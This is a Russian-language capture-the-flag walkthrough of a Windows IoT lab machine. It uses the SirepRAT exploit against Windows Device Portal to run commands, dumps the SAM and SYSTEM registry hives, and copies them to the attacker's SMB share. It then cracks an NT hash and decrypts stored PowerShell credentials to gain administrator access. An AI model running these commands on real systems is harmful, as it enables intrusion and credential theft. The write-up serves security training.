Обзор сервисов

Начнем со сканирования портов с помощью nmap машины 10.10.10.204:

$ nmap -sC -sV -p- -Pn -v 10.10.10.204
$ nmap --privileged -sU -sV -p- -Pn -v 10.10.10.204

PORT      STATE SERVICE  VERSION
135/tcp   open  msrpc    Microsoft Windows RPC
5985/tcp  open  upnp     Microsoft IIS httpd
8080/tcp  open  upnp     Microsoft IIS httpd
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Windows Device Portal
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn't have a title.
29817/tcp open  unknown
29819/tcp open  arcserve ARCserve Discovery
29820/tcp open  unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port29820-TCP:V=7.91%I=7%D=5/29%Time=60B25E0D%P=x86_64-pc-linux-gnu%r(N
SF:ULL,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(GenericLines,10,"
SF:\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(Help,10,"\*LY\xa5\xfb`\x0
SF:4G\xa9m\x1c\xc9}\xc8O\x12")%r(JavaRMI,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\x
SF:c9}\xc8O\x12");
Service Info: Host: PING; OS: Windows; CPE: cpe:/o:microsoft:windows

Обнаруживаем Windows Device Portal, для которого воспользуемся публичным эксплоитом:

git clone https://github.com/SafeBreach-Labs/SirepRAT
python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --as_logged_on_user --cmd "C:\Windows\System32\cmd.exe" --args " /c echo {{userprofile}}"

Дампнем файлы SAM и SYSTEM:

python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args " /c reg save HKLM\SYSTEM C:\SYSTEM"
python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args " /c reg save HKLM\SAM C:\SAM"

Запустим локальный сервер Samba, чтобы скачать файлы, и скопируем к себе на машину:

python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args " /c copy C:\SAM \\\\10.10.14.6\\Public\\SAM"
python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args " /c copy C:\SYSTEM \\\\10.10.14.6\\Public\\SYSTEM"

Запустим брутфорс:

$ samdump2 SYSTEM SAM > hash
$ echo "aad3b435b51404eeaad3b435b51404ee:e3cb0651718ee9b4faffe19a51faff95" > hash.txt
$ john --fork=4 --format=nt hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
app:mesh5143

Перейдем на http://10.10.10.204:8080/#Device%20Settings и введем полученные креды.

Пользовательский флаг 

Command> dir C:\data\users\app
 Volume in drive C is MainOS
 Volume Serial Number is 3C37-C677
 Directory of C:\data\users\app
07/04/2020  09:53 PM    <DIR>          .
07/04/2020  09:53 PM    <DIR>          ..
07/04/2020  07:28 PM    <DIR>          3D Objects
07/04/2020  07:28 PM    <DIR>          Documents
07/04/2020  07:28 PM    <DIR>          Downloads
07/04/2020  07:28 PM    <DIR>          Favorites
07/04/2020  08:20 PM               344 hardening.txt
07/04/2020  08:14 PM             1,858 iot-admin.xml
07/04/2020  07:28 PM    <DIR>          Music
07/04/2020  07:28 PM    <DIR>          Pictures
07/04/2020  09:53 PM             1,958 user.txt
07/04/2020  07:28 PM    <DIR>          Videos
               3 File(s)          4,160 bytes
               9 Dir(s)   4,692,443,136 bytes free
Command> type C:\data\users\app\hardening.txt
- changed default administrator password of "p@ssw0rd"
- added firewall rules to restrict unnecessary services
- removed administrator account from "Ssh Users" group
Command> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
   Connection-specific DNS Suffix  . : 
   IPv6 Address. . . . . . . . . . . : dead:beef::4943:80ed:ab82:e853
   Temporary IPv6 Address. . . . . . : dead:beef::2d12:c117:bdc3:a673
   Link-local IPv6 Address . . . . . : fe80::4943:80ed:ab82:e853%4
   IPv4 Address. . . . . . . . . . . : 10.10.10.204
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:1a7c%4
                                       10.10.10.2
Command> powershell -c "$credential = import-clixml -path C:\Data\Users\app\iot-admin.xml;$credential.GetNetworkCredential().password"
Omni\Administrator:_1nt3rn37ofTh1nGz
powershell -c "$credential = import-clixml -path C:\Data\Users\app\user.txt;$credential.GetNetworkCredential().password"
7cfd50f6bc34db3204898f1505ad9d70

Перелогинимся в качестве администратора.

Флаг суперпользователя 

$ powershell -c "$credential = import-clixml -path C:\Data\Users\administrator\root.txt;$credential.GetNetworkCredential().password"
5dbdce5569e2c4708617c0ce6e9bf11d